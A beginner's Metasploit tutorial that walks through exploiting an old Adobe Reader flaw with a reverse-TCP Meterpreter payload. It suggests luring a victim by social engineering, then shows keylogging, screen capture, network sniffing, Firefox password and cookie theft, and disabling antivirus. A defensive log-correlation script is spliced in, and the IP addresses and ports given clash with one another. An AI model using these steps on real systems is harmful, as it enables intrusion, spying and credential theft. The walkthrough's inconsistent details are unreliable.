Learn to Use Metasploit: Guide for Beginners


Last updated: October 16, 2023

Always wanted to learn how to use Metasploit but don't know where to start? Look no further! In this article, we'll take you step by step through the features of Metasploit and show you how to use this powerful tool to test the security of your systems.

Whether you are a beginner or experienced in computer security, this article is for you! Get ready to become an expert in using Metasploit in no time.

What is Metasploit framework

Imagine being able to break into any computer system around the world. Does that seem unachievable? Well, that’s where the Metasploit framework comes into play.

Metasploit is an incredibly powerful tool that allows you to exploit security vulnerabilities in computer systems. It is used by security professionals to test the security of their own systems, but also by hackers to break into other people's systems.

 

It contains a large database of exploit modules, payloads and post-exploitation scripts that can be used to automate security testing.

With Metasploit, you can perform penetration testing on your own systems to discover vulnerabilities before a hacker does.

In a few words, Metasploit is an essential tool for anyone interested in computer security. It gives you the means to become an ethical hacker and effectively protect your systems.

What can we do with Metasploit

The Framework allows you to do a lot of things like:

  • Scan and collect information about a target machine.
  • Detect and exploit vulnerabilities.
  • Escalate privileges on an operating system.
  • Install a backdoor to maintain persistent access.
  • Use the “Fuzzing” technique to test the robustness of software.
  • Use evasion tools to bypass security software.
  • Use payloads to run commands remotely on compromised systems.
  • Use pivot tools to propagate access to other connected systems.
  • Erase traces and logs to conceal malicious activity.

Main components of the Metasploit framework

The Metasploit framework is an incredibly powerful tool, but to get the most out of it, it's important to understand the different components that make it up.

Here are some of the main elements of Metasploit that will help you understand how this tool works:

  • MSFconsole: This is the main interface of Metasploit, where you issue commands and interact with the different modules. It's where you'll spend most of your time when working with Metasploit.
  • Exploit modules: These are the modules that allow you to exploit vulnerabilities discovered in target systems. There are modules for vulnerabilities in Windows, Linux, and many other operating systems.
  • Payloads: Payloads are pieces of code that are executed on compromised systems to perform specific tasks, such as executing remote commands, installing a backdoor, etc.
  • Post-exploitation modules: These modules allow you to collect information about compromised systems, maintain persistent access, bypass security protections, and more.
  • Auxiliary modules: These modules are used for specific tasks, such as scanning ports and retrieving target information.
  • Script modules: These modules allow you to run scripts to automate specific tasks, like exporting data, creating reports, etc.

By understanding these key components, you will be able to get the most out of Metasploit for testing the security of your systems.

Basic commands for using Metasploit

We now move on to the most exciting part: using Metasploit.

Here are the basic steps to exploit a system with Metasploit:

  1. Collect information about the target, such as operating system version and installed network services. This information can be retrieved using port scanning and footprinting tools such as Nmap, Maltego and Nessus.
  2. Choose and configure an appropriate exploit based on the information gathered.
  3. Check if the target system is susceptible to the chosen exploit using verification commands.
  4. Choose and configure an appropriate payload.
  5. Run the exploit with the configured settings to attempt to exploit the vulnerability.

Exploit side

The commands we will see in the following section are used to select and configure an exploit for a specific target before executing it.

It is important to understand the options for each exploit and configure them appropriately to maximize the exploit's chance of success.

Here are the basic commands for using Metasploit exploits:

  • View all available exploits: show exploits
  • Search for a specific exploit: search exploit_name
  • Select an exploit: use exploit_name
  • Get information about an exploit: info exploit_name
  • View exploit options: show options

Payload side

Payloads are used to define what the exploit will do once it succeeds. There are many types of payloads, ranging from simple command execution to remote shell installation. It is important to choose the appropriate payload for each situation and configure it correctly to maximize the chances of successful exploitation.

Here's how to use Metasploit payloads:

  • Show all available payloads: show payloads
  • Select a specific payload: set PAYLOAD payload_name
  • See the payload options for configuration: show options

In general

  • Get help: help
  • Know the version of Metasploit: version
  • List all exploits, modules, payloads: search
  • Exit Metasploit: quit

Install and use Metasploit

Ready to test your computer security skills? So listen up!

To set up a proper test environment, you need to download Kali Linux and install it as a virtual machine in VMware. And guess what? Metasploit is already pre-installed for your enjoyment.

Then download and install Windows XP to create a second virtual machine for you to experiment on.

But that's not all! In this second machine we will install a vulnerable version of the Adobe Acrobat Reader application. Yes, you heard right, vulnerable!

This vulnerability concerns Adobe Reader v9.0.0 (Windows XP SP3) and Adobe Reader v8.1.2 (Windows XP SP2). And be careful, because in certain cases, opening a PDF file with Adobe Acrobat Reader can cause a “Buffer overflow” and thus allow a malicious person to take control of a machine remotely.

Once you've installed your testing tools, launch your Metasploit console and show us what you're made of! And remember, learning is fun when it's exciting!

Exploit the Adobe Acrobat Reader flaw with Metasploit

Load the Payload

Are you ready to jump into the world of Metasploit? So, follow these simple steps to start your adventure!

To get started, open msfconsole.

  • Click on Applications.
  • Then, select Exploitation Tools.
  • Finally, click on Metasploit Framework.

Otherwise, use the “msfconsole” command in a terminal.

 

In a few seconds, a console will appear in front of you.

Now type the following commands:

# search for the Adobe exploit
search adobe_jbig2decode
# select the exploit
use exploit/windows/browser/adobe_jbig2decode
info exploit/windows/browser/adobe_jbig2decode
show options
# the IP address of the server used
set SRVHOST 192.168.64.5
set SRVPORT 80
# this is the URL path used for the exploit
set URIPATH /
show targets
set TARGET 0
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.64.5

Here we use a payload called “reverse_tcp”. The payload is a piece of code that runs on the target machine once the security vulnerability has been exploited. With reverse_tcp, the target machine itself opens the connection back to the address set in LHOST, which is why we can connect to it remotely even if it is protected by a firewall that blocks incoming connections.

Please note: in this case, the IP address 192.168.230.128 is the address of our virtual machine hosting the server that stores the infected PDF file. We will use this IP address to reach that virtual server and download the infected PDF file for our security tests.

Run the exploit

The module is now correctly configured, so we can launch the attack with the following command:

msf> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.230.128:4444
[*] Using URL: http://192.168.64.5:8080/
[*] Server started.

To set up our security test, Metasploit starts a temporary web server at the IP address 192.168.64.5.

The next step is to use the technique known as social engineering to send this address to a target person. When this person clicks on the link, a malicious PDF file will be offered for download. If the person agrees to open it with Adobe Reader, Metasploit will tell you that the vulnerability exploitation was successful.

It is important to note that the IP address 192.168.230.1 is that of our second virtual machine under Windows XP which is configured to be vulnerable. It was on this machine that we installed a vulnerable version of Adobe Acrobat Reader to perform our security tests.

As this is a test, we will download the malicious PDF file with our own account.
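From the defender's side, the sequence described above (a PDF fetched from a bare-IP URL, followed by an outbound connection from the same host to the handler port) can be looked for in proxy and firewall logs. The following is an added example, not part of the original article; the log formats, the EXPECTED_PORTS list and the 60-second window are assumptions, and the log lines are constructed from the lab addresses used here.

```python
import ipaddress
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample logs (assumed formats); addresses reuse the lab values above.
PROXY_LOG = """\
2023-10-16T10:00:01 192.168.230.1 GET http://192.168.64.5:8080/ application/pdf
2023-10-16T10:00:05 192.168.230.7 GET http://intranet.example/report.pdf application/pdf
2023-10-16T10:02:00 192.168.230.9 GET http://192.168.64.5:8080/ application/pdf
"""
FIREWALL_LOG = """\
2023-10-16T10:00:09 192.168.230.1 192.168.230.128 4444 ALLOW
2023-10-16T10:00:10 192.168.230.7 192.168.64.20 443 ALLOW
2023-10-16T10:30:00 192.168.230.9 192.168.230.128 4444 ALLOW
"""
EXPECTED_PORTS = {53, 80, 443}   # assumption: egress ports considered normal
WINDOW = timedelta(seconds=60)   # assumption: max delay between fetch and callback

def is_ip_literal(url):
    """True when the URL's host is a raw IP address rather than a name."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def pdf_fetches(proxy_log):
    """Yield (time, client, url) for PDFs served from an IP-literal URL."""
    for line in proxy_log.splitlines():
        ts, client, _method, url, ctype = line.split()
        if ctype == "application/pdf" and is_ip_literal(url):
            yield datetime.fromisoformat(ts), client, url

def find_callbacks(proxy_log, firewall_log):
    """Pair each suspicious PDF fetch with an allowed outbound connection to an
    unusual port made by the same client within WINDOW after the fetch."""
    fetches = list(pdf_fetches(proxy_log))
    alerts = []
    for line in firewall_log.splitlines():
        ts, src, dst, dport, action = line.split()
        when, port = datetime.fromisoformat(ts), int(dport)
        if action != "ALLOW" or port in EXPECTED_PORTS:
            continue
        for fetched_at, client, url in fetches:
            if client == src and timedelta(0) <= when - fetched_at <= WINDOW:
                alerts.append((src, url, f"{dst}:{port}", (when - fetched_at).seconds))
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(PROXY_LOG, FIREWALL_LOG):
        print("possible reverse-shell callback:", alert)
```

Only the first client is flagged: the second fetched its PDF from a named host and connected out on 443, and the third connected to port 4444 long after the window had closed.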

Open a Meterpreter session

All we have to do now is open a Meterpreter session remotely on the vulnerable machine:

msf> sessions -i 1
[*] Starting interaction with 1…

We now have full control of the second machine. Then we can do whatever we want.

For example, we can take screenshots remotely using the Espia extension from Meterpreter:

meterpreter> use espia
Loading extension espia… success.
screenshot hack.jpg

Or start a keylogger in order to capture everything typed on the keyboard:

keyscan_start
keyscan_dump
keyscan_stop

Or spy on the victim's network:

use sniffer
# list the available interfaces
sniffer_interfaces
# start the capture on interface 2
sniffer_start 2
# show how many packets were captured
sniffer_stats 2
# retrieve the captured packets
sniffer_dump 2 filename

Or open a command prompt dialog box:

meterpreter> shell
Process 892 created.
Channel 1 created.
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\My documents>

Some Meterpreter commands

  • run enum_firefox: this command allows you to retrieve all information related to Firefox (cookies, history, saved passwords).
  • run get_application_list: this command is used to find out the applications installed on the victim's computer.
  • run killav: deactivates the antivirus.
  • run kitrap0d: automates privilege escalation.

There are a hundred Meterpreter commands that can be very useful.
Of course, the method described above can be used for other vulnerabilities affecting different software. It is possible to list all known exploits with the following command: show exploits

You can do another test with a more recent vulnerability: the zero-day vulnerability in Internet Explorer.
The full explanation is in this post: How to exploit the Internet Explorer 0day vulnerability with Metasploit.

Conclusion

You have just discovered the incredible potential of Metasploit! It is not just a tool to exploit vulnerabilities in Adobe or Internet Explorer: there are hundreds of exploits available to attack all types of machines.

Metasploit is a powerful tool that continues to evolve and surprise IT security professionals. We hope that this guide has helped you master the basic commands of this amazing framework.

And if you want to know more about Metasploit or have ideas for improving this page, don't hesitate to leave a comment! We are always happy to hear your opinions and help you better master IT tools.